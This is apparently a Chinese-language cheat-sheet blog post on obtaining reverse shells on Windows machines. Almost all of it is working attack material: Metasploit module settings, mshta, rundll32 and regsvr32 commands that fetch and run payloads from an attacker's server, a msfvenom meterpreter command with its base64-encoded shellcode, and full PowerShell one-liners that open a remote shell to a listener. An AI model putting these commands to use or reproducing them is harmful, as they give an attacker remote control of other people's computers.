windows反弹shell(不免杀windows defender)

引子

以你现在的速度你只能逗留原地。如果你要抵达另一个地方,你必须以双倍于现在的速度奔跑。

思维导图和教程

一句话反弹shell&Reverse Shell In Windows

Koadic过defender上线

windows

mshta.exe

成功的操作

1
2
3
4
5
6
7
8
use exploit/windows/misc/hta_server
set srvhost 10.100.19.19
set lhost 10.100.19.19
set SRVPORT 53
exploit

mshta.exe http://10.100.19.19:53/tA7YRzR.hta

失败的操作

设置payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.19.19 LPORT=53 -f raw > shellcode.bin

cat shellcode.bin | base64 -w 0 > out.txt
将shellcode.bin base64编码

1
/EiD5PDozAAAAEFRQVBSUVZIMdJlSItSYEiLUhhIi1IgSItyUEgPt0pKTTHJSDHArDxhfAIsIEHByQ1BAcHi7VJBUUiLUiCLQjxIAdBmgXgYCwIPhXIAAACLgIgAAABIhcB0Z0gB0FCLSBhEi0AgSQHQ41ZI/8lBizSISAHWTTHJSDHArEHByQ1BAcE44HXxTANMJAhFOdF12FhEi0AkSQHQZkGLDEhEi0AcSQHQQYsEiEgB0EFYQVheWVpBWEFZQVpIg+wgQVL/4FhBWVpIixLpS////11JvndzMl8zMgAAQVZJieZIgeygAQAASYnlSbwCAAA1CgoTE0FUSYnkTInxQbpMdyYH/9VMiepoAQEAAFlBuimAawD/1WoKQV5QUE0xyU0xwEj/wEiJwkj/wEiJwUG66g/f4P/VSInHahBBWEyJ4kiJ+UG6maV0Yf/VhcB0Ckn/znXl6JMAAABIg+wQSIniTTHJagRBWEiJ+UG6AtnIX//Vg/gAflVIg8QgXon2akBBWWgAEAAAQVhIifJIMclBulikU+X/1UiJw0mJx00xyUmJ8EiJ2kiJ+UG6AtnIX//Vg/gAfShYQVdZaABAAABBWGoAWkG6Cy8PMP/VV1lBunVuTWH/1Un/zuk8////SAHDSCnGSIX2dbRB/+dYagBZScfC8LWiVv/V

handler -H 10.100.19.19 -P 53 -p windows/meterpreter/reverse_tcp

mshta.exe http://10.100.19.19/CACTUSTORCH.hta

易错点

handler不能设置为exploit/multi/handler

rundll.exe

use windows/smb/smb_delivery

set srvhost 192.168.123.123

rundll32.exe \192.168.1.109\vabFG\test.dll,0

Regsvr32.exe

1
2
3
4
5
6
use exploit/multi/script/web_delivery
msf exploit (web_delivery)>set target 3
msf exploit (web_delivery)> set payload windows/meterpreter/reverse_tcp
msf exploit (web_delivery)> set lhost 192.168.1.109
msf exploit (web_delivery)>set srvhost 192.168.1.109
msf exploit (web_delivery)>exploit

powershell & powercat

nc -lnvp 4455

1
2
3
4
powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("192.168.123.123",4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
这个代码反弹失败
---
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.123.123',4455);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

参考资料

https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/

https://hackersinterview.com/oscp/reverse-shell-one-liners-oscp-cheatsheet/